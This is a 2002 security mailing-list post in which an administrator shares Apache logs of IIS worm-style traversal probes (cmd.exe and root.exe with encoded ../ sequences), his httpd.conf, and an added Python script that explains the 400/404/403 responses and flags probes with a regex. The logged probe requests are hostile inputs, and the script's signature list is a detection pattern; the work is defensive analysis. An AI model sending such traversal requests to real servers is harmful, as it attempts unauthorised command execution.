From: Marcel Weber (mmweber_at_ncpro.com)
Date: Sat Oct 05 2002 - 18:38:12 CDT


    Hi

    I had some bizarre 404 entries in my apache logs. They are very rare, but it
    looks as if they resulted from an attempted attack. Well, say it was a rather
    lame attack, but I wonder where the 404 and 400 came from. As the server is
    configured, there should be only 403 answers, as the whole http part is
    closed, except for one directory and from the intranet. From the outside one
    can access the server via https only.

    I don't know if I have to be alerted or something, but I would feel better
    if someone could check my set-up, just to make sure that it is not a
    misconfiguration. The server is an older Compaq Proliant 800, some Pentium
    133 MHz. Rather slow; perhaps this has an influence.

    Below are the error.log and access.log in question and, at the end, the
    relevant section of the httpd.conf.

    Regards

    Marcel

    ############################################################################
    access.log: I put some newlines between the 404 and the rest of it.

    80.240.96.146 - - [29/Sep/2002:12:50:03 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 286 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 284 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 294 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 294 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 341 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"

    80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"

    80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"

    ###########################################################################
    In the error.log there are the following entries:

    [Sun Sep 29 12:50:03 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
    [Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/MSADC
    [Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/c
    [Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/d
    [Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
    [Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/_vti_bin
    [Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/_mem_bin
    [Sun Sep 29 12:50:06 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/msadc
    [Sun Sep 29 12:50:06 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
    [Sun Sep 29 12:50:07 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
    [Sun Sep 29 12:50:07 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
    [Sun Sep 29 12:50:08 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
    [Sun Sep 29 12:50:08 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts

    ###########################################################################

    Here comes my httpd.conf:

    <Location />
            Order allow,deny
            deny from all
    </Location>

    <VirtualHost _default_:80>
            ServerName xxx.foo.com
            ServerAlias xxx.faa.com

            <Location />
                    Order allow,deny
                    # allow access only from the intranet
                    allow from 192.x.x.0/24

                    AuthType Basic
                    AuthName "foo"
                    AuthLDAPBindDN "xxxxxxxxxxxxxxxxxxxxxxxx"
                    AuthLDAPBindPassword "xxxxxxxxxxxxxxxxxxx"
                    AuthLDAPUrl ldap://dddddddddddddddddddddddddddddddddddddd
                    require valid-user
            </Location>

            <Location /public>
                    Order allow,deny
                    allow from all
                    satisfy any
            </Location>

            <Location /zykadmin>
                    Order allow,deny
                    allow from 192.x.x.0/24
            </Location>

            <Location /servlets>
                    Order allow,deny
                    Allow from 192.x.x.0/24
            </Location>

            #### Servlets reachable via http
            WebAppDeploy examples warpConnection /servlets/examples/
            WebAppDeploy lagerchargen warpConnection /servlets/agauga/
    </VirtualHost>

    <VirtualHost _default_:443>
            DocumentRoot /var/www
            ServerName xxx.foo.com
            ServerAlias yyy.faa.com

            #### Servlets reachable via https
            WebAppDeploy examples warpConnection /servlets/examples/
            WebAppDeploy lagerchargen warpConnection /servlets/agauga/

            <Location />
                    Order allow,deny
                    allow from all

                    AuthType Basic
                    AuthName "iiiiiiiiiiiii"
                    AuthLDAPBindDN "ooooooooooooooooooo"
                    AuthLDAPBindPassword "xxxxxxxxxx"
                    AuthLDAPUrl ldap://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
                    require valid-user
            </Location>

            <IfModule mod_ssl.c>
                    SSLEngine on
                    SSLCertificateFile /etc/apache/ssl.crt/server.crt
                    SSLCertificateKeyFile /etc/apache/ssl.key/server.key
                    # SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
            </IfModule>
    </VirtualHost>

    --------------------

    PGP / GPG Key: http://www.ncpro.com/GPG/mmweber-at-ncpro-com.asc

    -- 
    To UNSUBSCRIBE, email to debian-security-requestlists.debian.org
    with a subject of "unsubscribe". Trouble? Contact listmasterlists.debian.org
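Added example (not part of the post above, and not Apache's own code): a small Python script that parses a constructed subset of the access.log entries quoted in the post, re-joined to one entry per line, and models the decision logic of Apache 1.3's ap_unescape_url(). That routine runs on the request path before any <Location> access check: a '%' that is not followed by two hex digits makes the request a 400 Bad Request, and a decoded byte of '/' (i.e. %2f) makes it a 404 Not Found. Only requests that survive decoding reach the access check that produces the 403s, which is also why the three non-403 lines have no matching "client denied by server configuration" entry in the error.log (13 error entries for 13 403s). The request paths are the well-known IIS Unicode and double-decode traversal probes (the sequence the Nimda worm sends); they cannot succeed against Apache, and the log shows the server refusing every one of them. The regexes, function names and the probe-signature list are this example's own assumptions.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: seven of the access.log entries quoted in the post,
# re-joined to one entry per line (the mailer had wrapped them).
SAMPLE_LOG = r'''
80.240.96.146 - - [29/Sep/2002:12:50:03 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 286 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
'''

# Apache "combined" log format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

OK, BAD_REQUEST, FORBIDDEN, NOT_FOUND = 0, 400, 403, 404
HEX = set('0123456789abcdefABCDEF')

# Assumed signature list for the IIS traversal / root.exe / cmd.exe probes seen in the
# post. A hit means "IIS worm-style probe", not "this server is vulnerable".
IIS_PROBE_RE = re.compile(
    r'(root\.exe|cmd\.exe|\.\.%25?5c|\.\.%c0%af|\.\.%c0%2f|\.\.%c1%(?:1c|9c))', re.I)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format access.log entry into its fields (None if malformed)."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def apache13_unescape(path: str) -> Tuple[int, bytes]:
    """Models the decision logic of Apache 1.3's ap_unescape_url(): a '%' not
    followed by two hex digits is a bad escape (-> 400); a decoded byte that is
    '/' or NUL is a bad path (-> 404); otherwise OK (0). A bad escape wins over
    a bad path. Apache applies this to the path only, after the query string
    has been split off, and before any <Location> access check runs."""
    out = bytearray()
    bad_escape = bad_path = False
    i = 0
    while i < len(path):
        if path[i] != '%':
            out += path[i].encode('utf-8')
            i += 1
            continue
        hexpart = path[i + 1:i + 3]
        if len(hexpart) < 2 or any(h not in HEX for h in hexpart):
            bad_escape = True          # Apache keeps the literal '%' and moves on
            out.append(ord('%'))
            i += 1
            continue
        byte = int(hexpart, 16)        # one decoded byte, e.g. %c0 -> 0xC0, %2f -> '/'
        if byte in (0x2F, 0x00):
            bad_path = True            # an encoded slash (or NUL) is refused with 404
        out.append(byte)
        i += 3
    if bad_escape:
        return BAD_REQUEST, bytes(out)
    if bad_path:
        return NOT_FOUND, bytes(out)
    return OK, bytes(out)


def predict_status(target: str) -> int:
    """Status the posted port-80 configuration should return to an outside client:
    decoding errors first, then the intranet-only allow list, which yields 403."""
    path = target.split('?', 1)[0]
    status, _decoded = apache13_unescape(path)
    return status if status != OK else FORBIDDEN


def analyze(log_text: str) -> List[Dict[str, object]]:
    """Compare the logged status of every entry with the predicted one and tag probes."""
    rows = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        logged = int(rec['status'])
        predicted = predict_status(rec['target'])
        rows.append({'ip': rec['ip'], 'target': rec['target'], 'logged': logged,
                     'predicted': predicted, 'match': logged == predicted,
                     'iis_probe': bool(IIS_PROBE_RE.search(rec['target']))})
    return rows


def summarize(rows: List[Dict[str, object]]) -> Dict[str, object]:
    """Counts per status plus the targets whose status the model cannot explain."""
    by_status: Dict[int, int] = {}
    for r in rows:
        by_status[r['logged']] = by_status.get(r['logged'], 0) + 1
    return {'lines': len(rows), 'by_status': by_status,
            'iis_probes': sum(1 for r in rows if r['iis_probe']),
            'unexplained': [r['target'] for r in rows if not r['match']]}


if __name__ == '__main__':
    rows = analyze(SAMPLE_LOG)
    for r in rows:
        print(f"{r['logged']} predicted={r['predicted']} probe={r['iis_probe']} {r['target']}")
    print(summarize(rows))
```

Run it against the full access.log by reading the file into analyze(); any target that ends up in 'unexplained' is one the decoding and access-control model above does not account for and deserves a closer look, whereas a 400 or 404 explained by a malformed escape or an encoded slash is the server rejecting the request before the access check, not a hole in the deny rules.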